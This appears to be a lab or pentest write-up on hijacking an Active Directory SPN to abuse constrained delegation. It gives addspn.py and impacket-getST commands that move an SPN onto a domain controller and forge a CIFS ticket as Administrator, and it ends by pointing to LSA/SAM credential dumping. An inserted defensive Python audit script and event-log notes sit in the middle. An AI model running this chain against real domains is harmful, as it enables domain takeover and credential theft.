WriteSPN

Deleting SPN

python3 /usr/share/krbrelayx/addspn.py -u 'militech.local\s.reed_adm' -p 'P@ssw0rd' -t 'WEB01$' -s 'HTTP/WEB01.militech.local' -r 13.13.13.13

Adding SPN

python3 /usr/share/krbrelayx/addspn.py -u 'militech.local\s.reed_adm' -p 'P@ssw0rd' -T samname -t 'DC01$' -s 'HTTP/WEB01.militech.local' 13.13.13.13

SPN Hijacking

If an attacker controls an account configured with Constrained Delegation to a specific SPN, and possesses WriteSPN privileges over a high-value target (like a Domain Controller), the delegation path can be hijacked.

By removing the allowed SPN from its original host and registering it to the high-value target, the KDC is forced to encrypt the delegated Service Ticket using the high-value target's password hash. Because the Service Name (sname) in the ticket header is not cryptographically protected by the KDC signature, it can be arbitrarily altered (e.g., changing HTTP to CIFS) before being presented to the target service.
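As an added defender-side check (not part of this page's tooling), the following Python audits an LDAP export for SPNs registered on a computer account other than the host named in the SPN, then cross-references them with constrained-delegation targets; the account names and SPN values are constructed sample data.

```python
import re

# Constructed sample data, not a real export: computer accounts with their
# servicePrincipalName values as they would appear in an LDAP dump.
COMPUTERS = {
    "WEB01$": ["HOST/WEB01", "HOST/WEB01.militech.local"],
    # HTTP/WEB01.militech.local registered on the DC is the hijack signature
    "DC01$": ["HOST/DC01.militech.local", "ldap/DC01.militech.local",
              "HTTP/WEB01.militech.local"],
}

# Constructed sample: accounts with constrained delegation and their
# msDS-AllowedToDelegateTo values.
DELEGATORS = {"s.reed_adm": ["HTTP/WEB01.militech.local"]}

# service/host[:port][/name]; only the host part matters here
SPN_RE = re.compile(r"^[^/]+/(?P<host>[^:/]+)(?::\d+)?(?:/.*)?$")


def spn_host(spn):
    """Short, upper-cased host name from an SPN, or None if it does not parse."""
    m = SPN_RE.match(spn)
    return m.group("host").split(".")[0].upper() if m else None


def find_misplaced_spns(computers):
    """(account, spn) pairs where the SPN names a host other than the
    computer account it is registered on."""
    findings = []
    for account, spns in computers.items():
        acct_host = account.rstrip("$").upper()
        for spn in spns:
            host = spn_host(spn)
            if host and host != acct_host:
                findings.append((account, spn))
    return findings


def delegation_at_risk(computers, delegators):
    """(user, spn, account) triples where a constrained-delegation target SPN
    is currently registered on the wrong host, so a service ticket for it
    would be issued under that host's key."""
    misplaced = {spn.lower(): acct for acct, spn in find_misplaced_spns(computers)}
    return [(user, t, misplaced[t.lower()])
            for user, targets in delegators.items()
            for t in targets if t.lower() in misplaced]


if __name__ == "__main__":
    for user, spn, acct in delegation_at_risk(COMPUTERS, DELEGATORS):
        print(f"{user} delegates to {spn}, which is now registered on {acct}")
```

Legitimate aliases (CNAME records, cluster names) will also trip the host-mismatch rule, so an allowlist is needed in practice. The same SPN move is also visible as a servicePrincipalName change in Directory Service object-modified audit events (Event ID 5136) when that auditing is enabled.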

Service Name (sname) Substitution

Now that the SPN has been moved to the target host, the only remaining step is to change the service class in the ticket from HTTP to CIFS, which gives full access to the file system (and so lets us dump LSA, SAM, etc.).

impacket-getST MILITECH.LOCAL/s.reed_adm:'P@ssw0rd' -spn HTTP/WEB01.militech.local -impersonate Administrator -dc-ip DC01.militech.local -altservice CIFS/DC01.militech.local
  • MILITECH.LOCAL/s.reed_adm:'P@ssw0rd': The compromised account holding Constrained Delegation rights.

  • -spn HTTP/WEB01.militech.local: The hijacked SPN, now registered on the target DC.

  • -impersonate Administrator: The privileged user being impersonated via S4U2Self and S4U2Proxy.

  • -altservice CIFS/DC01.militech.local: Alters the unencrypted sname field in the ticket from HTTP to CIFS.

DUMP

Then we can use the nxc --lsa and --sam options to dump credentials using the Administrator's ticket: